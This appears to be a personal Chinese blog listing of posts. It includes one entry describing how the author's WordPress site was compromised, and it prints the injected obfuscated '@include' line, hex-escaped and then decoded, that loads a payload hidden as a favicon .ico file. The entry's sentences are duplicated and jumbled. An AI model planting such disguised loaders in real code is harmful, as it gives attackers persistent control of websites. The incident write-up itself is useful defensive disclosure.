日出大梅沙 
Category : 摄影 | Post on 2017/09/27 07:28 by Richard | Comments:0
香江霓虹 
Category : 摄影 | Post on 2017/09/24 23:59 by Richard | Comments:0
网站终于恢复了 
Category : 站务 | Post on 2017/09/19 18:21 by Richard | Comments:0
鱼排晚宴相思处,夕阳西下几时回 
Category : 摄影 | Post on 2017/09/17 23:59 by Richard | Comments:0
台风过后 
Category : 随笔 | Post on 2017/08/24 00:06 by Richard | Comments:0
尊重 
Category : 拾遗 | Post on 2017/08/23 23:59 by Richard | Comments:0
WordPress漏洞被入侵 
Category : 站务 | Post on 2017/07/24 10:04 by Richard | Comments:0
偶然的机会,发现站内PHP代码有变化,继续追踪,发现是PhotoInfo站的链接公布出去以后,使用的WordPress被攻击。
导致整个网站原index.php的文件头
这里670e4这个编码是随机的,用于随机识别。Decode了之后是这样的:
?php后都被添加了这样一行代码:br>
导致整个网站原index.php的文件头
/*670e4*/
@include "\x2fhom\x65/rc\x68ann\x65t/p\x75bli\x63_ht\x6dl/p\x68one\x69nfo\x2fwp-\x61dmi\x6e/cs\x73/fa\x76ico\x6e_4a\x36299\x2eico";
/*670e4*/
@include "\x2fhom\x65/rc\x68ann\x65t/p\x75bli\x63_ht\x6dl/p\x68one\x69nfo\x2fwp-\x61dmi\x6e/cs\x73/fa\x76ico\x6e_4a\x36299\x2eico";
/*670e4*/
这里670e4这个编码是随机的,用于随机识别。Decode了之后是这样的:
@include "/home/rchannet/public_html/phoneinfo/wp-admin/css/favicon_4a6299.ico";
?php后都被添加了这样一行代码:br>